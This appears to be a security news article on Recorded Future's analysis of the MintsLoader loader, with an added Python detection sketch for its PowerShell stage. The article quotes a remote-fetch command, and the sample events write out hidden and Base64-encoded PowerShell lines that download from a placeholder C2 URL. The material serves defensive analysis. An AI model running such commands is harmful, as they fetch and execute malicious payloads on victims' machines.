Recorded Future researchers observed MintsLoader delivering payloads such as GhostWeaver via obfuscated scripts, evading detection with sandbox and VM checks, and using a DGA and HTTP-based C2.
MintsLoader is a malware loader first spotted in 2024. It has been observed delivering various follow-on payloads, including StealC and a modified version of the Berkeley Open Infrastructure for Network Computing (BOINC) client.
It implements a multi-stage infection chain built from obfuscated JavaScript and PowerShell scripts. The malware supports sandbox and virtual machine evasion techniques, a domain generation algorithm (DGA), and HTTP-based command-and-control (C2) communications.
MintsLoader is used by several threat groups, notably TAG-124. The attack chain commences via phishing messages, fake browser updates, and invoice lures through Italy’s PEC email system.
In early 2025, Recorded Future researchers observed a phishing campaign targeting the U.S. and European energy, oil, gas, and legal sectors; attackers attempted to deliver MintsLoader via malicious JavaScript or fake verification pages.
“In both cases, the result was the execution of MintsLoader’s PowerShell-based second stage on the victim’s machine. This loader pulled down the final payloads, notably the StealC infostealer and a modified BOINC client build,” reads the report published by Recorded Future. “The campaign leveraged fake CAPTCHA verification pages (ClickFix/KongTuke lures) to trick users into executing a copied PowerShell command, which downloaded and ran MintsLoader.”
The experts observed other infection chains that used fake invoice files (e.g., “Fattura####.js”) to deliver MintsLoader, mainly targeting industrial and professional sectors in North America and Europe.
MintsLoader’s first stage is a heavily obfuscated JavaScript file designed to execute a PowerShell command that downloads the second stage from a remote server. The researchers identified three variants of the loader: one with cleartext PowerShell, another using character replacement, and a third with Base64 encoding. Despite the differences, all variants aim to run a PowerShell command (e.g., `curl -useb http://[domain]/1.php?s=[campaign]`) to fetch the next payload. This stage also uses evasion techniques like junk code and disguised commands to bypass detection.
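As an added illustration, not code from the Recorded Future report, the Python below sketches detection logic for the stage-one behaviour described above: a script host running a Fattura####.js lure launching PowerShell that fetches a `/1.php?s=[campaign]` URL, covering both the cleartext and the Base64-encoded variant. The event field names (pid, ppid, image, cmdline), the placeholder domain and the sample events are constructed assumptions.

```python
import base64
import re
# Stage-1 traits from the report: a .js lure (e.g. Fattura####.js) launches PowerShell running
# "curl -useb http://[domain]/1.php?s=[campaign]"; one variant Base64-encodes the command.
FETCH_RE = re.compile(r"\b(curl|iwr|invoke-webrequest)\s+-useb(asicparsing)?\b", re.I)
STAGE_URL_RE = re.compile(r"https?://[^\s\"']+/1\.php\?s=", re.I)
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
SCRIPT_HOST_RE = re.compile(r"(?:^|\\)(wscript|cscript)\.exe\b", re.I)
JS_ARG_RE = re.compile(r"\.js\b", re.I)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand argument (Base64 of UTF-16LE), or ''."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:  # binascii.Error (bad Base64) is a ValueError subclass
        return ""

def score_event(event, by_pid):
    """Return the stage-1 indicators matched by one PowerShell process-creation event."""
    reasons = []
    if "powershell" not in event.get("image", "").lower():
        return reasons
    cmd = event.get("cmdline", "")
    effective = cmd + " " + decode_encoded_command(cmd)  # inspect decoded -enc payloads too
    if FETCH_RE.search(effective) and STAGE_URL_RE.search(effective):
        reasons.append("fetches stage 2 from a /1.php?s=[campaign] URL")
    parent = by_pid.get(event.get("ppid"), {})
    if SCRIPT_HOST_RE.search(parent.get("image", "")) and JS_ARG_RE.search(parent.get("cmdline", "")):
        reasons.append("spawned by wscript/cscript running a .js file")
    return reasons

def scan_events(events):
    """Map pid -> matched indicators for every suspicious event in a batch."""
    by_pid = {e["pid"]: e for e in events}
    return {e["pid"]: r for e in events if (r := score_event(e, by_pid))}
# Constructed sample events (field names and values assumed, not taken from the report).
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENCODED_STAGE1 = base64.b64encode("curl -useb http://c2-placeholder.invalid/1.php?s=demo".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"pid": 4412, "ppid": 3800, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\user\Downloads\Fattura2051.js"'},
    {"pid": 4420, "ppid": 4412, "image": PS_IMAGE,  # cleartext variant
     "cmdline": 'powershell -w hidden -c "curl -useb http://c2-placeholder.invalid/1.php?s=demo"'},
    {"pid": 4430, "ppid": 4412, "image": PS_IMAGE, "cmdline": "powershell -w hidden -enc " + ENCODED_STAGE1},
    {"pid": 5100, "ppid": 3800, "image": PS_IMAGE,  # benign: -useb without the 1.php?s= stage URL
     "cmdline": 'powershell -c "curl -useb https://updates.example.invalid/version.txt"'},
]
```

Running `scan_events(SAMPLE_EVENTS)` flags only the two PowerShell children of the .js lure; the benign `curl -useb` download is left alone because the stage URL pattern is required alongside the fetch.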
In stage two of MintsLoader, the malicious code downloads a PowerShell script from a command-and-control (C2) server via an HTTP GET request. This script contains a Base64-encoded payload that is XOR-decoded and decompressed to reveal heavily obfuscated code. The script disables AMSI protections and runs multiple system checks, such as VM detection, DAC type, and cache memory purpose, to generate a unique key sent to the C2. The C2 delivers a final payload or a decoy based on the unique key.
Based on the system’s characteristics and campaign ID, the script constructs a dynamic domain using a simple domain generation algorithm (DGA) to fetch stage three. If the target passes the checks, the loader downloads advanced malware like GhostWeaver, a PowerShell-based RAT with TLS-encrypted C2 communication and capabilities to redeploy MintsLoader. If the system fails validation, the C2 may deliver a decoy executable like AsyncRAT, which has led to misclassifications in threat reports.
Recorded Future found MintsLoader C2 servers initially hosted on BLNWX, later expanding to ISPs such as Stark Industries and SCALAXY-AS, linked to the Russian bulletproof host Inferno Solutions.
“The switch to SCALAXY-AS and Stark Industries Solutions suggests that MintsLoader operators have shifted from relying on anonymous virtual private server (VPS) providers to more traditional bulletproof hosters, likely in an effort to harden their infrastructure against takedown attempts and enhance operational stability.” concludes the report that includes indicators of compromise (IoCs).